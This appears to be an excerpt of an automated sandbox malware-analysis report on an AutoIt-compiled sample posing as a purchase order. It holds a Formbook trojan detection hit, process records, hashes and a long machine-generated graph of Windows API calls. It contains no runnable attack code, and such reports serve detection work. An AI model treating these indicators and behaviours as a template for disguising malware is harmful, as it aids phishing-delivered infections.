                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:8
                    Start time:07:02:44
                    Start date:12/09/2024
                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Imagebase:0x7ff79f9e0000
                    File size:676'768 bytes
                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true


                      Execution Graph

                      Execution Coverage:2.9%
                      Dynamic/Decrypted Code Coverage:1%
                      Signature Coverage:10.7%
                      Total number of Nodes:1722
                      Total number of Limit Nodes:146
109207->109208 109209 ab28e8 109207->109209 109208->109197 109213 ab889e 47 API calls __getptd_noexit 109209->109213 109211 ab28ee GetLastError 109211->109208 109212->109187 109213->109211 109214->109100 109215->109107 109216->109119 109218 ab7abb 109217->109218 109223 ab7945 109218->109223 109222 ab7ad6 109222->109121 109224 ab795f _memset ___raise_securityfailure 109223->109224 109225 ab797f IsDebuggerPresent 109224->109225 109231 ab8e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 109225->109231 109228 ab7a66 109230 ab8e27 GetCurrentProcess TerminateProcess 109228->109230 109229 ab7a43 ___raise_securityfailure 109232 abb4bf 109229->109232 109230->109222 109231->109229 109233 abb4c9 IsProcessorFeaturePresent 109232->109233 109234 abb4c7 109232->109234 109236 ac4560 109233->109236 109234->109228 109239 ac450f 5 API calls 2 library calls 109236->109239 109238 ac4643 109238->109228 109239->109238 109240->109125 109242 ab8984 __lock 47 API calls 109241->109242 109243 ab2030 109242->109243 109299 ab8ae8 LeaveCriticalSection 109243->109299 109245 a936fb 109246 ab208d 109245->109246 109247 ab20b1 109246->109247 109248 ab2097 109246->109248 109247->109133 109248->109247 109300 ab889e 47 API calls __getptd_noexit 109248->109300 109250 ab20a1 109301 ab7aa0 8 API calls _xtow_s@20 109250->109301 109252 ab20ac 109252->109133 109253->109135 109302 a94257 109254->109302 109256 a9377f IsDebuggerPresent 109257 a9378d 109256->109257 109258 b021b7 MessageBoxA 109256->109258 109260 b021d0 109257->109260 109261 a937aa 109257->109261 109290 a93852 109257->109290 109258->109260 109259 a93859 SetCurrentDirectoryW 109264 a93716 SystemParametersInfoW 109259->109264 109473 ad2f5b 48 API calls 109260->109473 109366 a93bff 109261->109366 109264->109138 109265 b021e0 109270 b021f6 SetCurrentDirectoryW 109265->109270 109267 a937c8 GetFullPathNameW 109378 a934f3 109267->109378 109270->109264 109271 a9380f 109272 a93818 109271->109272 109474 acbe31 AllocateAndInitializeSid 
CheckTokenMembership FreeSid 109271->109474 109393 a930a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 109272->109393 109276 b02213 109276->109272 109279 b02224 GetModuleFileNameW 109276->109279 109278 a93822 109281 a93837 109278->109281 109401 a93598 109278->109401 109280 a9caee 48 API calls 109279->109280 109282 b02245 109280->109282 109411 a9e1f0 109281->109411 109285 b02271 109282->109285 109286 b0224c 109282->109286 109478 a939e8 48 API calls 2 library calls 109285->109478 109475 a939e8 48 API calls 2 library calls 109286->109475 109290->109259 109291 b02257 109476 a939e8 48 API calls 2 library calls 109291->109476 109295 b02264 109477 a939e8 48 API calls 2 library calls 109295->109477 109296 b022a5 Mailbox 109296->109290 109298 b0226d GetForegroundWindow ShellExecuteW 109298->109296 109299->109245 109300->109250 109301->109252 109479 a93c70 109302->109479 109306 a94278 GetModuleFileNameW 109496 a934c1 109306->109496 109311 a9caee 48 API calls 109312 a942ba 109311->109312 109313 a9d380 55 API calls 109312->109313 109314 a942ca Mailbox 109313->109314 109315 a9caee 48 API calls 109314->109315 109316 a942f2 109315->109316 109317 a9d380 55 API calls 109316->109317 109318 a94305 Mailbox 109317->109318 109319 a9caee 48 API calls 109318->109319 109320 a94316 109319->109320 109511 a9d2d2 109320->109511 109322 a94328 Mailbox 109323 a9d3d2 48 API calls 109322->109323 109324 a9433b 109323->109324 109517 a94477 109324->109517 109328 a94355 109329 a9435f 109328->109329 109330 b020f7 109328->109330 109332 ab1bc7 _W_store_winword 59 API calls 109329->109332 109331 a94477 48 API calls 109330->109331 109333 b0210b 109331->109333 109334 a9436a 109332->109334 109336 a94477 48 API calls 109333->109336 109334->109333 109335 a94374 109334->109335 109337 ab1bc7 _W_store_winword 59 API calls 109335->109337 109338 b02127 109336->109338 109339 a9437f 109337->109339 109341 b0212f GetModuleFileNameW 109338->109341 109340 a94389 109339->109340 109339->109341 109343 ab1bc7 
_W_store_winword 59 API calls 109340->109343 109342 a94477 48 API calls 109341->109342 109345 b02160 109342->109345 109344 a94394 109343->109344 109346 a943d6 109344->109346 109350 a94477 48 API calls 109344->109350 109353 b02185 _wcscpy 109344->109353 109347 a9c935 48 API calls 109345->109347 109348 a943e7 109346->109348 109346->109353 109349 b0216e 109347->109349 109354 a93320 48 API calls 109348->109354 109351 a94477 48 API calls 109349->109351 109352 a943b8 _wcscpy 109350->109352 109355 b0217d 109351->109355 109360 a94477 48 API calls 109352->109360 109356 a94477 48 API calls 109353->109356 109357 a943ff 109354->109357 109355->109353 109358 b021ab 109356->109358 109533 aa14a0 109357->109533 109358->109358 109360->109346 109361 aa14a0 48 API calls 109363 a9440f 109361->109363 109363->109361 109364 a94477 48 API calls 109363->109364 109365 a94451 Mailbox 109363->109365 109549 a97bef 48 API calls 109363->109549 109364->109363 109365->109256 109367 a93c1f 109366->109367 109368 b03ce4 _memset 109366->109368 110078 a931b8 109367->110078 109370 b03cf6 GetOpenFileNameW 109368->109370 109370->109367 109372 a937c0 109370->109372 109371 a93c28 110085 a93a67 SHGetMalloc 109371->110085 109372->109267 109372->109290 109374 a93c31 110090 a93b45 GetFullPathNameW 109374->110090 110166 a9a716 109378->110166 109380 a93501 109381 a93575 109380->109381 110177 a921dd 86 API calls 109380->110177 109381->109265 109381->109271 109383 a9350a 109383->109381 110178 a95460 88 API calls Mailbox 109383->110178 109385 a93513 109385->109381 109386 a93517 GetFullPathNameW 109385->109386 109387 a97e53 48 API calls 109386->109387 109388 a93541 109387->109388 109389 a97e53 48 API calls 109388->109389 109390 a9354e 109389->109390 109391 b066b4 _wcscat 109390->109391 109392 a97e53 48 API calls 109390->109392 109392->109381 109394 b021b0 109393->109394 109395 a9310f 109393->109395 110181 a9318a 109395->110181 109399 a93185 109400 a92e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 
109399->109400 109400->109278 109402 a935c3 _memset 109401->109402 110187 a938c4 109402->110187 109406 b045c2 Shell_NotifyIconW 109407 a93666 Shell_NotifyIconW 110191 a938e4 109407->110191 109409 a93648 109409->109406 109409->109407 109410 a9367b 109410->109281 109412 a9e216 109411->109412 109447 a9e226 Mailbox 109411->109447 109414 a9e670 109412->109414 109412->109447 109413 add520 86 API calls 109413->109447 110299 aaecee 346 API calls 109414->110299 109416 a9e4e7 109417 a93842 109416->109417 110300 a9322e 16 API calls 109416->110300 109417->109290 109472 a92b94 Shell_NotifyIconW _memset 109417->109472 109419 a9e681 109419->109417 109421 a9e68e 109419->109421 109420 a9e26c PeekMessageW 109420->109447 110301 aaec33 346 API calls Mailbox 109421->110301 109423 b05b13 Sleep 109423->109447 109424 a9e695 LockWindowUpdate DestroyWindow GetMessageW 109424->109417 109426 a9e6c7 109424->109426 109428 b062a7 TranslateMessage DispatchMessageW GetMessageW 109426->109428 109428->109428 109430 b062d7 109428->109430 109429 aacf79 49 API calls 109429->109447 109430->109417 109431 a9e657 PeekMessageW 109431->109447 109432 ab010a 48 API calls 109432->109447 109433 a9e517 timeGetTime 109433->109447 109435 a9c935 48 API calls 109435->109447 109436 b05dfc WaitForSingleObject 109439 b05e19 GetExitCodeProcess CloseHandle 109436->109439 109436->109447 109437 a9e641 TranslateMessage DispatchMessageW 109437->109431 109438 b06147 Sleep 109445 b05cce Mailbox 109438->109445 109439->109447 109440 a9d3d2 48 API calls 109440->109445 109441 a9e6cc timeGetTime 110302 aacf79 49 API calls 109441->110302 109442 b05feb Sleep 109442->109445 109445->109440 109445->109447 109448 aae3a5 timeGetTime 109445->109448 109449 b061de GetExitCodeProcess 109445->109449 109451 b05cea Sleep 109445->109451 109454 b05cd7 Sleep 109445->109454 109455 af8a48 108 API calls 109445->109455 109456 a91dce 107 API calls 109445->109456 109458 b06266 Sleep 109445->109458 109461 a9caee 48 API calls 109445->109461 109464 a9d380 55 
API calls 109445->109464 110304 ad56dc 49 API calls Mailbox 109445->110304 110305 aacf79 49 API calls 109445->110305 110306 a91000 346 API calls 109445->110306 110345 aed12a 50 API calls 109445->110345 110346 ad8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 109445->110346 110347 ad6f5b 63 API calls 3 library calls 109445->110347 109447->109413 109447->109416 109447->109420 109447->109423 109447->109429 109447->109431 109447->109432 109447->109433 109447->109435 109447->109436 109447->109437 109447->109438 109447->109441 109447->109442 109447->109445 109447->109451 109469 a9caee 48 API calls 109447->109469 109470 a9d380 55 API calls 109447->109470 109471 a91000 322 API calls 109447->109471 110222 a9e7e0 109447->110222 110229 a9ea00 109447->110229 110279 aa44e0 109447->110279 110295 a9e7b0 346 API calls Mailbox 109447->110295 110296 aa3680 346 API calls 2 library calls 109447->110296 110297 aaf381 TranslateAcceleratorW 109447->110297 110298 aaed1a IsDialogMessageW GetClassLongW 109447->110298 110303 af8b20 48 API calls 109447->110303 110307 a9fa40 109447->110307 109448->109445 109452 b061f4 WaitForSingleObject 109449->109452 109453 b0620a CloseHandle 109449->109453 109451->109447 109452->109447 109452->109453 109453->109445 109454->109451 109455->109445 109456->109445 109458->109447 109461->109445 109464->109445 109469->109447 109470->109447 109471->109447 109472->109290 109473->109265 109474->109276 109475->109291 109476->109295 109477->109298 109478->109298 109480 a9d3d2 48 API calls 109479->109480 109481 a93c80 109480->109481 109482 a9a359 109481->109482 109483 a9a366 __ftell_nolock 109482->109483 109484 a97e53 48 API calls 109483->109484 109488 a9a4cc Mailbox 109483->109488 109485 a9a398 109484->109485 109494 a9a3ce Mailbox 109485->109494 109550 a9a4f6 109485->109550 109487 a9a49f 109487->109488 109489 a9caee 48 API calls 109487->109489 109488->109306 109491 a9a4c0 109489->109491 109490 a9caee 48 API calls 
109490->109494 109554 a95b47 48 API calls _memmove 109491->109554 109492 a9a4f6 48 API calls 109492->109494 109494->109487 109494->109488 109494->109490 109494->109492 109553 a95b47 48 API calls _memmove 109494->109553 109555 a93f9b 109496->109555 109499 a934ea 109508 a98182 109499->109508 109502 b034c3 109504 ab28ca _free 47 API calls 109502->109504 109505 b034d0 109504->109505 109506 a93e39 84 API calls 109505->109506 109507 b034d9 109506->109507 109507->109507 109509 ab010a 48 API calls 109508->109509 109510 a942ad 109509->109510 109510->109311 109512 a9d30a 109511->109512 109513 a9d2df 109511->109513 109512->109322 109516 a9d2e6 109513->109516 110072 a9d349 53 API calls 109513->110072 109516->109512 110071 a9d349 53 API calls 109516->110071 109518 a9449a 109517->109518 109519 a94481 109517->109519 109521 a97e53 48 API calls 109518->109521 109520 a9c935 48 API calls 109519->109520 109522 a94347 109520->109522 109521->109522 109523 ab1bc7 109522->109523 109524 ab1c48 109523->109524 109525 ab1bd3 109523->109525 110075 ab1c5a 59 API calls 3 library calls 109524->110075 109532 ab1bf8 109525->109532 110073 ab889e 47 API calls __getptd_noexit 109525->110073 109528 ab1c55 109528->109328 109529 ab1bdf 110074 ab7aa0 8 API calls _xtow_s@20 109529->110074 109531 ab1bea 109531->109328 109532->109328 109534 aa1606 109533->109534 109536 aa14b2 109533->109536 109534->109363 109537 ab010a 48 API calls 109536->109537 109548 aa14be 109536->109548 109538 b05299 109537->109538 109539 ab010a 48 API calls 109538->109539 109547 b052a4 109539->109547 109540 aa14c9 109541 aa156d 109540->109541 109542 ab010a 48 API calls 109540->109542 109541->109363 109543 aa15af 109542->109543 109544 aa15c2 109543->109544 110076 aad6b4 48 API calls 109543->110076 109544->109363 109546 ab010a 48 API calls 109546->109547 109547->109546 109547->109548 109548->109540 110077 a9346e 48 API calls 109548->110077 109549->109363 109551 a9b8a7 48 API calls 109550->109551 109552 a9a501 109551->109552 
109552->109485 109553->109494 109554->109488 109620 a93f5d 109555->109620 109560 b05830 109563 a93e39 84 API calls 109560->109563 109561 a93fc6 LoadLibraryExW 109630 a93e78 109561->109630 109565 b05837 109563->109565 109567 a93e78 3 API calls 109565->109567 109569 b0583f 109567->109569 109568 a93fed 109568->109569 109570 a93ff9 109568->109570 109656 a9417d 109569->109656 109572 a93e39 84 API calls 109570->109572 109574 a934e2 109572->109574 109574->109499 109579 adcc82 109574->109579 109576 b05866 109664 a941cb 109576->109664 109578 b05873 109580 a941a7 83 API calls 109579->109580 109581 adccf1 109580->109581 109845 adce59 109581->109845 109584 a9417d 64 API calls 109585 adcd1e 109584->109585 109586 a9417d 64 API calls 109585->109586 109587 adcd2e 109586->109587 109588 a9417d 64 API calls 109587->109588 109589 adcd49 109588->109589 109590 a9417d 64 API calls 109589->109590 109591 adcd64 109590->109591 109592 a941a7 83 API calls 109591->109592 109593 adcd7b 109592->109593 109594 ab45ec std::exception::_Copy_str 47 API calls 109593->109594 109595 adcd82 109594->109595 109596 ab45ec std::exception::_Copy_str 47 API calls 109595->109596 109597 adcd8c 109596->109597 109598 a9417d 64 API calls 109597->109598 109599 adcda0 109598->109599 109600 adc846 GetSystemTimeAsFileTime 109599->109600 109601 adcdb3 109600->109601 109602 adcddd 109601->109602 109603 adcdc8 109601->109603 109604 adcde3 109602->109604 109605 adce42 109602->109605 109606 ab28ca _free 47 API calls 109603->109606 109851 adc251 118 API calls __fcloseall 109604->109851 109608 ab28ca _free 47 API calls 109605->109608 109609 adcdce 109606->109609 109611 adcd07 109608->109611 109612 ab28ca _free 47 API calls 109609->109612 109610 adce3a 109613 ab28ca _free 47 API calls 109610->109613 109611->109502 109614 a93e39 109611->109614 109612->109611 109613->109611 109615 a93e4a 109614->109615 109616 a93e43 109614->109616 109618 a93e59 109615->109618 109619 a93e6a FreeLibrary 109615->109619 109852 ab4274 109616->109852 
109618->109502 109619->109618 109669 a93f20 109620->109669 109624 a93f8d FreeLibrary 109625 a93f96 109624->109625 109627 ab4129 109625->109627 109626 a93f85 109626->109624 109626->109625 109677 ab413e 109627->109677 109629 a93fba 109629->109560 109629->109561 109756 a93eb3 109630->109756 109633 a93e9f 109635 a93ea8 FreeLibrary 109633->109635 109636 a93eb1 109633->109636 109635->109636 109637 a94010 109636->109637 109638 ab010a 48 API calls 109637->109638 109639 a94025 109638->109639 109764 a94bce 109639->109764 109641 a94031 _memmove 109642 a94129 109641->109642 109643 a94161 109641->109643 109647 a9406c 109641->109647 109767 a931f2 CreateStreamOnHGlobal 109642->109767 109778 add03f 93 API calls 109643->109778 109644 a941cb 57 API calls 109653 a94075 109644->109653 109647->109644 109648 a9417d 64 API calls 109648->109653 109650 a94109 109650->109568 109651 b05794 109652 a941a7 83 API calls 109651->109652 109654 b057a8 109652->109654 109653->109648 109653->109650 109653->109651 109773 a941a7 109653->109773 109655 a9417d 64 API calls 109654->109655 109655->109650 109657 a9418f 109656->109657 109658 b0587d 109656->109658 109802 ab44ae 109657->109802 109661 adc846 109822 adc6a0 109661->109822 109663 adc85c 109663->109576 109665 a941da 109664->109665 109666 b058bf 109664->109666 109827 ab4af5 109665->109827 109668 a941e2 109668->109578 109673 a93f32 109669->109673 109672 a93f08 LoadLibraryA GetProcAddress 109672->109626 109674 a93f28 109673->109674 109675 a93f3b LoadLibraryA 109673->109675 109674->109626 109674->109672 109675->109674 109676 a93f4c GetProcAddress 109675->109676 109676->109674 109680 ab414a __tzset_nolock 109677->109680 109678 ab415d 109725 ab889e 47 API calls __getptd_noexit 109678->109725 109680->109678 109682 ab418e 109680->109682 109681 ab4162 109726 ab7aa0 8 API calls _xtow_s@20 109681->109726 109696 abf278 109682->109696 109685 ab4193 109686 ab41a9 109685->109686 109687 ab419c 109685->109687 109689 ab41d3 109686->109689 109690 ab41b3 109686->109690 
109727 ab889e 47 API calls __getptd_noexit 109687->109727 109710 abf390 109689->109710 109728 ab889e 47 API calls __getptd_noexit 109690->109728 109693 ab416d __tzset_nolock @_EH4_CallFilterFunc@8 109693->109629 109697 abf284 __tzset_nolock 109696->109697 109698 ab8984 __lock 47 API calls 109697->109698 109708 abf292 109698->109708 109699 abf302 109730 abf387 109699->109730 109700 abf309 109735 ab7660 47 API calls std::exception::_Copy_str 109700->109735 109703 abf310 109703->109699 109705 abf31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 109703->109705 109704 abf37c __tzset_nolock 109704->109685 109705->109699 109706 ab8a0c __mtinitlocknum 47 API calls 109706->109708 109708->109699 109708->109700 109708->109706 109733 ab5ade 48 API calls __lock 109708->109733 109734 ab5b48 LeaveCriticalSection LeaveCriticalSection _doexit 109708->109734 109719 abf3b0 __wopenfile 109710->109719 109711 abf3ca 109740 ab889e 47 API calls __getptd_noexit 109711->109740 109712 abf585 109712->109711 109716 abf5e8 109712->109716 109714 abf3cf 109741 ab7aa0 8 API calls _xtow_s@20 109714->109741 109737 ac7179 109716->109737 109717 ab41de 109729 ab4200 LeaveCriticalSection LeaveCriticalSection _fseek 109717->109729 109719->109711 109719->109712 109742 ab247b 59 API calls 2 library calls 109719->109742 109721 abf57e 109721->109712 109743 ab247b 59 API calls 2 library calls 109721->109743 109723 abf59d 109723->109712 109744 ab247b 59 API calls 2 library calls 109723->109744 109725->109681 109726->109693 109727->109693 109728->109693 109729->109693 109736 ab8ae8 LeaveCriticalSection 109730->109736 109732 abf38e 109732->109704 109733->109708 109734->109708 109735->109703 109736->109732 109745 ac6961 109737->109745 109739 ac7192 109739->109717 109740->109714 109741->109717 109742->109721 109743->109723 109744->109712 109747 ac696d __tzset_nolock 109745->109747 109746 ac697f 109748 ab889e _xtow_s@20 47 API calls 109746->109748 109747->109746 109749 ac69b6 109747->109749 109750 
ac6984 109748->109750 109752 ac6a28 __wsopen_helper 110 API calls 109749->109752 109751 ab7aa0 _xtow_s@20 8 API calls 109750->109751 109755 ac698e __tzset_nolock 109751->109755 109753 ac69d3 109752->109753 109754 ac69fc __wsopen_helper LeaveCriticalSection 109753->109754 109754->109755 109755->109739 109760 a93ec5 109756->109760 109759 a93ef0 LoadLibraryA GetProcAddress 109759->109633 109761 a93e91 109760->109761 109762 a93ece LoadLibraryA 109760->109762 109761->109633 109761->109759 109762->109761 109763 a93edf GetProcAddress 109762->109763 109763->109761 109765 ab010a 48 API calls 109764->109765 109766 a94be0 109765->109766 109766->109641 109768 a9320c FindResourceExW 109767->109768 109772 a93229 109767->109772 109769 b057d3 LoadResource 109768->109769 109768->109772 109770 b057e8 SizeofResource 109769->109770 109769->109772 109771 b057fc LockResource 109770->109771 109770->109772 109771->109772 109772->109647 109774 a941b6 109773->109774 109777 b0589d 109773->109777 109779 ab471d 109774->109779 109776 a941c4 109776->109653 109778->109647 109783 ab4729 __tzset_nolock 109779->109783 109780 ab4737 109792 ab889e 47 API calls __getptd_noexit 109780->109792 109782 ab475d 109794 ab5a9f 109782->109794 109783->109780 109783->109782 109785 ab473c 109793 ab7aa0 8 API calls _xtow_s@20 109785->109793 109786 ab4763 109800 ab468e 81 API calls 4 library calls 109786->109800 109789 ab4772 109801 ab4794 LeaveCriticalSection LeaveCriticalSection _fseek 109789->109801 109791 ab4747 __tzset_nolock 109791->109776 109792->109785 109793->109791 109795 ab5aaf 109794->109795 109796 ab5ad1 EnterCriticalSection 109794->109796 109795->109796 109797 ab5ab7 109795->109797 109798 ab5ac7 109796->109798 109799 ab8984 __lock 47 API calls 109797->109799 109798->109786 109799->109798 109800->109789 109801->109791 109805 ab44c9 109802->109805 109804 a941a0 109804->109661 109806 ab44d5 __tzset_nolock 109805->109806 109807 ab44eb _memset 109806->109807 109808 ab4518 109806->109808 109809 ab4510 
__tzset_nolock 109806->109809 109818 ab889e 47 API calls __getptd_noexit 109807->109818 109810 ab5a9f __lock_file 48 API calls 109808->109810 109809->109804 109811 ab451e 109810->109811 109820 ab42eb 62 API calls 5 library calls 109811->109820 109814 ab4505 109819 ab7aa0 8 API calls _xtow_s@20 109814->109819 109815 ab4534 109821 ab4552 LeaveCriticalSection LeaveCriticalSection _fseek 109815->109821 109818->109814 109819->109809 109820->109815 109821->109809 109825 ab40da GetSystemTimeAsFileTime 109822->109825 109824 adc6af 109824->109663 109826 ab4108 __aulldiv 109825->109826 109826->109824 109828 ab4b01 __tzset_nolock 109827->109828 109829 ab4b0f 109828->109829 109830 ab4b24 109828->109830 109841 ab889e 47 API calls __getptd_noexit 109829->109841 109831 ab5a9f __lock_file 48 API calls 109830->109831 109833 ab4b2a 109831->109833 109843 ab479c 55 API calls 5 library calls 109833->109843 109834 ab4b14 109842 ab7aa0 8 API calls _xtow_s@20 109834->109842 109837 ab4b35 109844 ab4b55 LeaveCriticalSection LeaveCriticalSection _fseek 109837->109844 109839 ab4b47 109840 ab4b1f __tzset_nolock 109839->109840 109840->109668 109841->109834 109842->109840 109843->109837 109844->109839 109847 adce6d __tzset_nolock _wcscmp 109845->109847 109846 a9417d 64 API calls 109846->109847 109847->109846 109848 adc846 GetSystemTimeAsFileTime 109847->109848 109849 adcd03 109847->109849 109850 a941a7 83 API calls 109847->109850 109848->109847 109849->109584 109849->109611 109850->109847 109851->109610 109853 ab4280 __tzset_nolock 109852->109853 109854 ab42ac 109853->109854 109855 ab4294 109853->109855 109858 ab5a9f __lock_file 48 API calls 109854->109858 109860 ab42a4 __tzset_nolock 109854->109860 109881 ab889e 47 API calls __getptd_noexit 109855->109881 109857 ab4299 109882 ab7aa0 8 API calls _xtow_s@20 109857->109882 109861 ab42be 109858->109861 109860->109615 109865 ab4208 109861->109865 109866 ab422b 109865->109866 109867 ab4217 109865->109867 109868 ab4227 109866->109868 109884 ab3914 
109866->109884 109924 ab889e 47 API calls __getptd_noexit 109867->109924 109883 ab42e3 LeaveCriticalSection LeaveCriticalSection _fseek 109868->109883 109870 ab421c 109925 ab7aa0 8 API calls _xtow_s@20 109870->109925 109877 ab4245 109901 abf782 109877->109901 109879 ab424b 109879->109868 109880 ab28ca _free 47 API calls 109879->109880 109880->109868 109881->109857 109882->109860 109883->109860 109885 ab3927 109884->109885 109886 ab394b 109884->109886 109885->109886 109887 ab35c3 __fputwc_nolock 47 API calls 109885->109887 109890 abf8e6 109886->109890 109888 ab3944 109887->109888 109926 abbd14 109888->109926 109891 ab423f 109890->109891 109892 abf8f3 109890->109892 109894 ab35c3 109891->109894 109892->109891 109893 ab28ca _free 47 API calls 109892->109893 109893->109891 109895 ab35cd 109894->109895 109896 ab35e2 109894->109896 110032 ab889e 47 API calls __getptd_noexit 109895->110032 109896->109877 109898 ab35d2 110033 ab7aa0 8 API calls _xtow_s@20 109898->110033 109900 ab35dd 109900->109877 109902 abf78e __tzset_nolock 109901->109902 109903 abf7ae 109902->109903 109904 abf796 109902->109904 109906 abf82b 109903->109906 109909 abf7d8 109903->109909 110049 ab886a 47 API calls __getptd_noexit 109904->110049 110053 ab886a 47 API calls __getptd_noexit 109906->110053 109907 abf79b 110050 ab889e 47 API calls __getptd_noexit 109907->110050 109913 abb6a0 ___lock_fhandle 49 API calls 109909->109913 109911 abf830 110054 ab889e 47 API calls __getptd_noexit 109911->110054 109915 abf7de 109913->109915 109914 abf838 110055 ab7aa0 8 API calls _xtow_s@20 109914->110055 109917 abf7fc 109915->109917 109918 abf7f1 109915->109918 110051 ab889e 47 API calls __getptd_noexit 109917->110051 110034 abf84c 109918->110034 109920 abf7a3 __tzset_nolock 109920->109879 109922 abf7f7 110052 abf823 LeaveCriticalSection __unlock_fhandle 109922->110052 109924->109870 109925->109868 109927 abbd20 __tzset_nolock 109926->109927 109928 abbd28 109927->109928 109929 abbd40 109927->109929 110024 ab886a 47 
API calls __getptd_noexit 109928->110024 109931 abbdd5 109929->109931 109935 abbd72 109929->109935 110029 ab886a 47 API calls __getptd_noexit 109931->110029 109932 abbd2d 110025 ab889e 47 API calls __getptd_noexit 109932->110025 109951 abb6a0 109935->109951 109936 abbdda 110030 ab889e 47 API calls __getptd_noexit 109936->110030 109939 abbd78 109941 abbd8b 109939->109941 109942 abbd9e 109939->109942 109940 abbde2 110031 ab7aa0 8 API calls _xtow_s@20 109940->110031 109960 abbdf6 109941->109960 110026 ab889e 47 API calls __getptd_noexit 109942->110026 109945 abbd35 __tzset_nolock 109945->109886 109947 abbd97 110028 abbdcd LeaveCriticalSection __unlock_fhandle 109947->110028 109948 abbda3 110027 ab886a 47 API calls __getptd_noexit 109948->110027 109952 abb6ac __tzset_nolock 109951->109952 109953 abb6f9 EnterCriticalSection 109952->109953 109954 ab8984 __lock 47 API calls 109952->109954 109955 abb71f __tzset_nolock 109953->109955 109956 abb6d0 109954->109956 109955->109939 109957 abb6db InitializeCriticalSectionAndSpinCount 109956->109957 109958 abb6ed 109956->109958 109957->109958 109959 abb723 ___lock_fhandle LeaveCriticalSection 109958->109959 109959->109953 109961 abbe03 __ftell_nolock 109960->109961 109962 abbe5f 109961->109962 109963 abbe40 109961->109963 109987 abbe35 109961->109987 109966 abbeb8 109962->109966 109967 abbe9c 109962->109967 109965 ab886a __dosmaperr 47 API calls 109963->109965 109964 abb4bf _$I10_OUTPUT 6 API calls 109968 abc61e 109964->109968 109969 abbe45 109965->109969 109971 abbecf 109966->109971 109975 ac05df __lseeki64_nolock 49 API calls 109966->109975 109970 ab886a __dosmaperr 47 API calls 109967->109970 109968->109947 109972 ab889e _xtow_s@20 47 API calls 109969->109972 109974 abbea1 109970->109974 109973 ac49a2 __flswbuf 47 API calls 109971->109973 109976 abbe4c 109972->109976 109977 abbedd 109973->109977 109978 ab889e _xtow_s@20 47 API calls 109974->109978 109975->109971 109979 ab7aa0 _xtow_s@20 8 API calls 109976->109979 109980 abc1fe 

                      Control-flow Graph

                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 02b47647f8459f4050b65bb74434fb3e90851c0ff66a8fba4bca3fb8037bfeb5
                      • Instruction ID: 654fda8eea8c141d57ada46896f62a70242dc7ccdcbc0ec5bbaebfb8a1d2a52d
                      • Opcode Fuzzy Hash: 02b47647f8459f4050b65bb74434fb3e90851c0ff66a8fba4bca3fb8037bfeb5
                      • Instruction Fuzzy Hash: F5326E75B022288FDB24DF58DD40AE9B7B9FB46320F4441D9E40AE7A86D7749E80CF52

                      Control-flow Graph

                      APIs
                      • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00A9376D
                        • Part of subcall function 00A94257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00000104,?,00000000,00000001,00000000), ref: 00A9428C
                      • IsDebuggerPresent.KERNEL32(?,?), ref: 00A9377F
                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00000104,?,00B51120,C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00B51124,?,?), ref: 00A937EE
                        • Part of subcall function 00A934F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A9352A
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A93860
                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00B42934,00000010), ref: 00B021C5
                      • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00B021FD
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00B02232
                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B2DAA4), ref: 00B02290
                      • ShellExecuteW.SHELL32(00000000), ref: 00B02297
                        • Part of subcall function 00A930A5: GetSysColorBrush.USER32(0000000F), ref: 00A930B0
                        • Part of subcall function 00A930A5: LoadCursorW.USER32(00000000,00007F00), ref: 00A930BF
                        • Part of subcall function 00A930A5: LoadIconW.USER32(00000063), ref: 00A930D5
                        • Part of subcall function 00A930A5: LoadIconW.USER32(000000A4), ref: 00A930E7
                        • Part of subcall function 00A930A5: LoadIconW.USER32(000000A2), ref: 00A930F9
                        • Part of subcall function 00A930A5: RegisterClassExW.USER32(?), ref: 00A93167
                        • Part of subcall function 00A92E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A92ECB
                        • Part of subcall function 00A92E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A92EEC
                        • Part of subcall function 00A92E9D: ShowWindow.USER32(00000000), ref: 00A92F00
                        • Part of subcall function 00A92E9D: ShowWindow.USER32(00000000), ref: 00A92F09
